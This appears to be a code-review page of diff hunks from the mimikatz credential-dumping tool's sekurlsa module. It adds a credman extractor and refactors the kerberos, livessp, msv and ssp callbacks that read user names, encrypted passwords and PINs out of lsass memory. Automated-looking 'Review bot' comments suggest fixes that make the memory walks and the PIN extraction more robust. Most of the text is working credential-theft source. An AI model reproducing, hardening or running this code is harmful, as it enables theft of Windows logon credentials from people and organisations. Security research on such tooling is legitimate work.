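Review bot: The new `_KIWI_MSV1_0_LIST_61` (hunk `@ -80,7 +107,49`) declares `struct _KIWI_MSV1_0_LIST_6 *Flink;` and `struct _KIWI_MSV1_0_LIST_6 *Blink;`, and the renamed `_KIWI_MSV1_0_LIST_60` keeps the same two context lines, but this commit renames the `_KIWI_MSV1_0_LIST_6` tag away (`} KIWI_MSV1_0_LIST_60, *PKIWI_MSV1_0_LIST_60;`), so both structs now link through a pointer to an undeclared, incomplete type. It still compiles because C allows pointers to undeclared struct tags, but any `Flink->` access would fail and the declared type no longer describes the list. Use the struct's own tag, as `_KIWI_MSV1_0_LIST_51`/`_52`/`_62`/`_63` already do: `struct _KIWI_MSV1_0_LIST_60 *Flink;` / `struct _KIWI_MSV1_0_LIST_60 *Blink;` in LIST_60 and `struct _KIWI_MSV1_0_LIST_61 *Flink;` / `struct _KIWI_MSV1_0_LIST_61 *Blink;` in LIST_61.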
|
||||
|
@ -0,0 +1,98 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_credman_single_package, 1, NULL, NULL);
|
||||
}
|
||||
|
||||
const CREDMAN_INFOS credhelper[] = {
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_5),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_60),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, encPassword),
|
||||
},
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
PVOID pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
|
||||
if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA)
|
||||
CredOffsetIndex = 0;
|
||||
else if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 1;
|
||||
else
|
||||
CredOffsetIndex = 2;
|
||||
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY)))
|
||||
{
|
||||
aLocalMemory.address = &listStarter;
|
||||
if(aLsassMemory.address = setList.list1)
|
||||
{
|
||||
pRef = (PBYTE) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_LIST_STARTER)))
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
if(aLsassMemory.address = listStarter.start)
|
||||
{
|
||||
while(aLsassMemory.address != pRef)
|
||||
{
|
||||
aLsassMemory.address = (PBYTE) aLsassMemory.address - credhelper[CredOffsetIndex].offsetFLink;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
kprintf(L"\n\t [%08x]", nbCred);
|
||||
kiwiCreds.UserName = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetUsername);
|
||||
kiwiCreds.Domaine = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetDomain);
|
||||
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetCbPassword);;
|
||||
kiwiCreds.Password.Buffer = *(PWSTR *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetPassword);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS, externalCallback, externalCallbackData);
|
||||
aLsassMemory.address = *(PVOID *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetFLink);
|
||||
}
|
||||
else break;
|
||||
nbCred++;
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
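Review bot: The `while(aLsassMemory.address != pRef)` walk in `kuhl_m_sekurlsa_enum_logon_callback_credman` follows `Flink` values read out of live lsass memory with no upper bound; the only other exit is a failed `kull_m_memory_copy`, so a list being modified concurrently, or a corrupted link that forms a cycle not passing through `pRef`, spins this thread forever inside the host process. Bound the loop on the counter that is already there, e.g. `while(aLsassMemory.address != pRef && nbCred < 4096)` (pick whatever ceiling suits the credential store), and keep in mind that `nbCred++` is only skipped on the `else break;` path, which is fine because the loop exits there. The line `kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) (... + credhelper[CredOffsetIndex].offsetCbPassword);;` reads the low half of a `ULONG cbEncPassword` through a `PUSHORT`, which is correct only on little-endian targets and hides the truncation; `(USHORT) *(PULONG) (...)` says what is meant, and the doubled `;;` should go.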
|
@ -0,0 +1,104 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#pragma once
|
||||
#include "../kuhl_m_sekurlsa.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _CREDMAN_INFOS {
|
||||
ULONG structSize;
|
||||
ULONG offsetFLink;
|
||||
ULONG offsetUsername;
|
||||
ULONG offsetDomain;
|
||||
ULONG offsetCbPassword;
|
||||
ULONG offsetPassword;
|
||||
} CREDMAN_INFOS, *PCREDMAN_INFOS;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_5 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk8;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_5, *PKIWI_CREDMAN_LIST_ENTRY_5;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_60, *PKIWI_CREDMAN_LIST_ENTRY_60;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
LIST_ENTRY unk4;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY, *PKIWI_CREDMAN_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_STARTER {
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_ENTRY start;
|
||||
//...
|
||||
} KIWI_CREDMAN_LIST_STARTER, *PKIWI_CREDMAN_LIST_STARTER;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Blink;
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_STARTER list1;
|
||||
PKIWI_CREDMAN_LIST_STARTER list2;
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
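Review bot: `struct _KIWI_CREDMAN_LIST_ENTRY *Flink;` and `struct _KIWI_CREDMAN_LIST_ENTRY *Blink;` inside `_KIWI_CREDMAN_LIST_ENTRY_5` and `_KIWI_CREDMAN_LIST_ENTRY_60` name the Windows 7+ layout rather than the struct being declared, so the link type is wrong for the 5.x and 6.0 entries. The walker in credman.c never dereferences these fields (it goes through `credhelper[...].offsetFLink` and raw reads), so nothing breaks today, but the declaration misleads the next reader of the layout. Declare them with the struct's own tag: `struct _KIWI_CREDMAN_LIST_ENTRY_5 *Flink;` / `*Blink;` and `struct _KIWI_CREDMAN_LIST_ENTRY_60 *Flink;` / `*Blink;`.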
|
@ -124,34 +124,34 @@ LONG kuhl_m_sekurlsa_kerberos_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID st
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_kerberos_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
UNICODE_STRING pinCode;
|
||||
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
if(cLsass->osContext.MajorVersion < 6)
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, logId);
|
||||
if(pData->cLsass->osContext.MajorVersion < 6)
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId);
|
||||
else
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, logId);
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId);
|
||||
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), logId, 0, externalCallback, externalCallbackData);
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, externalCallback, externalCallbackData);
|
||||
if(aLsassMemory.address = (*(PUNICODE_STRING *) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
|
||||
{
|
||||
aLocalMemory.address = &pinCode;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, logId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
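Review bot: `aLocalMemory.address = &pinCode;` in the PIN branch of `kuhl_m_sekurlsa_enum_logon_callback_kerberos` overwrites the pointer that `LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize)` stored a few lines earlier, so the `LocalFree(aLocalMemory.address);` at the end of that block frees the address of a stack variable and leaks the heap buffer whenever a session has a PIN; these are context lines, but this refactor touches every line around them and is the moment to fix it. Give the PIN copy its own descriptor, `KULL_M_MEMORY_ADDRESS aPinMemory = {&pinCode, &hLocalMemory};` declared with the other locals, delete the reassignment, and call `if(kull_m_memory_copy(&aPinMemory, &aLsassMemory, sizeof(UNICODE_STRING)))` so `aLocalMemory.address` still holds the allocation when it is freed.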
|
||||
|
@ -10,7 +10,7 @@ KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN PVOID tickets);
|
||||
|
@ -31,17 +31,17 @@ LONG kuhl_m_sekurlsa_livessp_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID sta
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_livessp_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = LiveGlobalLogonSessionList;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY)))
|
||||
{
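Review bot: `pData` and `pData->cLsass` are dereferenced in the initializer of `aLsassMemory` on the new side (the `KULL_M_MEMORY_ADDRESS` declaration) before any guard runs, so the callback's requirement that `pData` is non-NULL is only implicit; the same pattern appears in the rewritten `kuhl_m_sekurlsa_enum_logon_callback_ssp`, `_tspkg` and `_wdigest` callbacks in this commit. A one-line precondition comment above the signature would make the contract visible to callers: `// pData: non-NULL, owned by the enumerator; this callback reads only pData->cLsass and pData->LogonId`. The enumerator that invokes these callbacks is not on this page, so whether a NULL `pData` can actually reach here is inferred, not established.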
|
||||
@ -49,7 +49,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CO
|
||||
{
|
||||
aLocalMemory.address = &primaryCredential;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, (pData->cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
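Review bot: The rewritten call still compares `pData->cLsass->osContext.BuildNumber` against the bare literal `9431`, while the neighbouring callbacks on this page use named build constants such as `KULL_M_WIN_BUILD_VISTA` for the same kind of check. Since the line is being touched anyway, either a named constant from that family or a trailing comment, `/* build 9431: output is flagged NODECRYPT for this build — document why */`, would explain why this one build is special. The enclosing function `kuhl_m_sekurlsa_enum_logon_callback_livessp` starts outside this hunk.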
|
||||
|
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
{
|
||||
|
@ -22,10 +22,10 @@ LONG kuhl_m_sekurlsa_msv_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_msv_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
MSV1_0_STD_DATA stdData = {logId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(cLsass, pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
MSV1_0_STD_DATA stdData = {pData->LogonId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
|
@ -59,7 +59,7 @@ KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package;
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[]);
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
|
@ -36,14 +36,14 @@ LONG kuhl_m_sekurlsa_ssp_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_ssp_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
ULONG monNb = 0;
|
||||
|
||||
